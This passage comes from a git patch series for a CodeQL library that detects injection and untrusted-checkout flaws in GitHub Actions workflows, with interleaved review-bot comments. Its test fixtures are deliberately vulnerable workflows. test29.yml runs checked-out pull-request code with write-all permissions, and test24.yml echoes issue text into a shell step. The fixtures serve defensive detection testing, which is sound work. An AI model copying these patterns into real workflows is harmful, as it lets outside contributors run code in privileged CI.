config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | From 263582c7969ede1c3d8a1022756434fe0d1054bd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 30 Oct 2024 12:43:19 +0100 Subject: [PATCH 650/707] feat: Add sanitizers for bash test commands --- ql/lib/codeql/actions/Bash.qll | 23 ++++++- .../CWE-094/.github/workflows/test23.yml | 64 +++++++++++++++++++ 2 files changed, 86 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index fda27732828e..7f2d4aeef9c3 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll 
@@ -691,11 +691,32 @@ module Bash {
 // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value)
 script.getAnAssignment(var2, value2) and
 containsCmdSubstitution(value2, cmd) and
- containsParameterExpansion(expr, var2, _, _)
+ containsParameterExpansion(expr, var2, _, _) and
+ not varMatchesRegexTest(script, var2, alphaNumericRegex())
 )
 or
 // var reaches the file write directly
 // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value)
 containsCmdSubstitution(expr, cmd)
 }
+
+ /**
+ * Holds if there test command that checks a variable against a regex
+ * eg: `[[ $VAR =~ ^[a-zA-Z0-9_]+$ ]]`
+ */
+ bindingset[var, regex]
+ predicate varMatchesRegexTest(BashShellScript script, string var, string regex) {
+ exists(string lhs, string rhs |
+ lhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 1) and
+ containsParameterExpansion(lhs, var, _, _) and
+ rhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 2) and
+ trimQuotes(rhs).regexpMatch(regex)
+ )
+ }
+
+ /**
+ * Holds if the given regex is used to match an alphanumeric string
+ * eg: `^[0-9a-zA-Z]{40}$`, `^[0-9]+$` or `^[a-zA-Z0-9_]+$`
+ */
+ string alphaNumericRegex() { result = "^\\^\\[([09azAZ_-]+)\\](\\+|\\{\\d+\\})\\$$" }
 }
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml
new file mode 100644
index 000000000000..184bcd966108
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml
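Review bot: In `varMatchesRegexTest` the two `script.getACommand()` calls are independent, so `lhs` can come from one `[[ … =~ … ]]` test and `rhs` from a different one: a script containing `[[ $A =~ ^foo ]]` and `[[ $B =~ ^[0-9]+$ ]]` treats `$A` as validated by the numeric regex. Bind the test command once and take both captures from it (below). The check is also flow-insensitive — a `>> $GITHUB_OUTPUT` write placed outside the `then` branch of the test is still treated as sanitized — which deserves a line in the QLDoc such as `* Note: flow-insensitive; the test is not required to guard the write.`. `alphaNumericRegex()` admits only the literal characters `0-9a-zA-Z_-` inside the class, so the common hex form `^[0-9a-f]{40}$` is not recognised; that is conservative, but worth a comment. The QLDoc typo `Holds if there test command` should read `Holds if a test command checks a variable against a regex`.
```ql
  bindingset[var, regex]
  predicate varMatchesRegexTest(BashShellScript script, string var, string regex) {
    exists(string test, string lhs, string rhs |
      // one command supplies both sides of the `[[ lhs =~ rhs ]]` test
      test = script.getACommand() and
      lhs = test.regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 1) and
      rhs = test.regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 2) and
      containsParameterExpansion(lhs, var, _, _) and
      trimQuotes(rhs).regexpMatch(regex)
    )
  }
```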
@@ -0,0 +1,64 @@ +on: + workflow_run: + +jobs: + test: + runs-on: ubuntu-22.04 + if: > + (github.event.workflow_run.event == 'pull_request' || + github.event.workflow_run.event == 'pull_request_target') && + github.event.workflow_run.conclusion == 'success' + + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "doc-build-artifact" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{steps.setup-env.outputs.current_work_dir}}/doc-build-artifact.zip', Buffer.from(download.data)); + + - run: | + mkdir build_dir + unzip doc-build-artifact.zip -d build_dir + + - name: Get commit_sha & pr_number + id: github-context + run: | + content_commit_sha=$(cat ./build_dir/commit_sha) + if [[ $content_commit_sha =~ ^[0-9a-zA-Z]{40}$ ]]; then + echo "commit_sha=$content_commit_sha" >> $GITHUB_OUTPUT + rm -rf ./build_dir/commit_sha + else + echo "Encountered an invalid commit_sha" + exit 1 + fi + + content_pr_number=$(cat ./build_dir/pr_number) + if [[ $content_pr_number =~ ^[0-9]+$ ]]; then + echo "pr_number=$content_pr_number" >> $GITHUB_OUTPUT + rm -rf ./build_dir/pr_number + else + echo "Encountered an invalid pr_number" + exit 1 + fi + + - run: | + echo "hub_docs_url=pr_${{ steps.github-context.outputs.pr_number }}" >> $GITHUB_OUTPUT + + - run: | + cd build_dir + doc-builder push --commit_msg "Updated with commit ${{ steps.github-context.outputs.commit_sha }} From a2f162e4822182ab993a7017e1af624dc2aeb8a0 Mon Sep 17 00:00:00 2001 
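Review bot: The new fixture only exercises the sanitized path — both `content_commit_sha` and `content_pr_number` are written to `$GITHUB_OUTPUT` inside the `then` branch of their `=~` tests — and no `.expected` file changes in this commit, so the test can only show that nothing is reported, not that the sanitizer discriminates. A sibling step that writes the unchecked value, e.g. `echo "raw_sha=$content_commit_sha" >> $GITHUB_OUTPUT` before the `if`, consumed later as `${{ steps.github-context.outputs.raw_sha }}`, would pin the positive case. The `fs.writeFileSync('${{steps.setup-env.outputs.current_work_dir}}/...` path references a `setup-env` step that does not exist in this workflow, harmless for a fixture but confusing. The final `doc-builder push --commit_msg "Updated with commit ...` line appears to be missing its closing quote, though that may be truncation in this view.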
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 30 Oct 2024 12:43:44 +0100 Subject: [PATCH 651/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a33cecb6fe03..f5f8abdce209 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.81 +version: 0.1.82 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6d1bc8634ba8..c0f849e1f3e1 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.81 +version: 0.1.82 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0157bf3297d1d2173efe9036ba6606273813d6e8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 30 Oct 2024 22:12:17 +0100 Subject: [PATCH 652/707] fix: improve JS require/import poisonable step to account for cwd --- .../actions/security/PoisonableSteps.qll | 5 +++-- .../CWE-829/.github/workflows/test29.yml | 21 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 2 ++ 3 files changed, 26 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index d446c4466410..1f3bc66bd776 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
@@ -21,9 +21,10 @@ class JavascriptImportUsesStep extends PoisonableStep, UsesStep {
 this.getCallee() = "actions/github-script" and
 script = this.getArgument("script") and
 line = script.splitAt("\n").trim() and
+ // const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')
 // const script = require('${{ github.workspace }}/scripts/test.js');
- // await script({ github, context, core });
- line.regexpMatch(".*(import|require)\\b.*github.workspace\\b.*")
+ // const script = require('./scripts');
+ line.regexpMatch(".*(import|require)\\(('|\")(\\./|.*github.workspace).*")
 )
 }
 }
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml
new file mode 100644
index 000000000000..cc7f71a7b3e4
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml
@@ -0,0 +1,21 @@
+on: pull_request_target
+
+jobs:
+ test:
+ permissions: write-all
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ fetch-depth: 0
+
+ - uses: actions/github-script@v5
+ with:
+ github-token: ${{secrets.GITHUB_TOKEN}}
+ script: |
+ const {
+ foo
+ } = require('./foo');
+
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 35d61dac5faf..85c2529c54c3
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
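Review bot: The new pattern `".*(import|require)\\(('|\")(\\./|.*github.workspace).*"` is tighter than the old `\\b`-based one but still misses ordinary spellings of a workspace-relative load: a template literal such as `` require(`${process.env.GITHUB_WORKSPACE}/x`) `` fails the `('|\")` alternative, `require('../x')` fails `\\./`, and whitespace after the opening parenthesis (`require( './x')`) fails the `\\(` adjacency. One widened expression covers all three: `line.regexpMatch(".*(import|require)\\(\\s*('|\"|`)(\\.\\.?/|.*github\\.workspace|.*GITHUB_WORKSPACE).*")` — the `GITHUB_WORKSPACE` alternative only if the query intends to treat the environment variable like the context expression. A comment that `line` is a single trimmed line of the script would also make clear why the new test29 fixture matches: its `require('./foo')` call sits entirely on the `} = require('./foo');` line. The enclosing class `JavascriptImportUsesStep` starts outside the hunk.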
@@ -285,6 +285,7 @@ edges | .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | | .github/workflows/test28.yml:17:9:20:6 | Uses Step | .github/workflows/test28.yml:20:9:20:22 | Run Step | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -346,6 +347,7 @@ edges | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | | .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:14:7:21:11 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | | 
.github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | From ebd45ace50d3daef7b0457dfdfe868b2d5d64d60 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 10:59:05 +0100 Subject: [PATCH 653/707] feat: add source model for peter-murra/issue-forms-body-parser --- ...r-murray_issue-forms-body-parser.model.yml | 6 ++++++ .../CWE-094/.github/workflows/test24.yml | 19 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 4 ++++ .../CWE-094/CodeInjectionMedium.expected | 3 +++ 4 files changed, 32 insertions(+) create mode 100644 ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml diff --git a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml new file mode 100644 index 000000000000..14bd9a7875ac --- /dev/null +++ b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["peter-murray/issue-forms-body-parser", "*", "output.payload", "text", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml new file mode 100644 index 000000000000..a90c55df9377 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml 
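Review bot: The new model row marks `output.payload` of `peter-murray/issue-forms-body-parser` as a `text` source for every version (`*`) and regardless of how the action is invoked, but the file carries no comment saying what makes the value untrusted. A one-line comment above the row, e.g. `# payload is the parsed body of the issue selected by issue_id (see test24.yml), i.e. attacker-controlled text`, would let a maintainer judge the unconditional source and the open version range. If some versions of the action also accept an explicit body input, a summary row (`input.body` to `output.payload`) would be the more precise model, as done for the zentered parser elsewhere in this series — worth confirming against the action's `action.yml`.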
@@ -0,0 +1,19 @@ +on: + issues: + +jobs: + test: + runs-on: ubuntu-22.04 + steps: + - name: Run Issue form parser + id: parse + uses: peter-murray/issue-forms-body-parser@v4.0.0 + with: + issue_id: ${{ github.event.issue.number }} + separator: '###' + label_marker_start: '>>' + label_marker_end: '<<' + + - name: Show parsed data JSON + run: | + echo ${{ steps.parse.outputs.payload }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index a862c0901ca7..a3119c0fd75b 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -198,6 +198,7 @@ edges | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -583,6 +584,8 @@ nodes | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -760,6 +763,7 @@ subpaths | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index be14d58737ee..0af7aeb0958e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -198,6 +198,7 @@ edges | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -583,6 +584,8 @@ nodes | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From d85ca107725fd6f277c614ee7c22d3ebc5ad5ba3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:36:59 +0100 Subject: [PATCH 654/707] fix: account for tojson(expr) expressions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1589b18efb02..e5ad86a226c8 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1636,7 +1636,7 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) 
@@ -1677,7 +1677,7 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1721,7 +1721,7 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1780,7 +1780,7 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) @@ -1815,7 +1815,7 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { exists(string expr | ( exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or exists(getASimpleReferenceExpression(expression, _)) and expr = normalizeExpr(expression) From 0211902116d2216877ce7126434cd7475d43f218 Mon Sep 17 00:00:00 2001 
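Review bot: The regex `"(?i)(from|to)json\\((.*)\\).*"` with capture group 2 is now repeated verbatim in five classes (`StepsExpressionImpl`, `NeedsExpressionImpl`, `JobsExpressionImpl`, `EnvExpressionImpl`, `MatrixExpressionImpl`), so the next wrapper function or nested form will again have to be applied in five places. Hoisting it into one helper, `private string jsonWrappedInner(string expression) { result = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) }`, and writing `expr = jsonWrappedInner(expression)` in each class keeps them in step. Note that `(.*)` is greedy, so for an expression like `toJSON(steps.a.outputs.x) == toJSON(steps.b.outputs.y)` the capture spans both references; that is pre-existing behaviour, but a comment on the helper would record it. Each of these classes starts outside its hunk.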
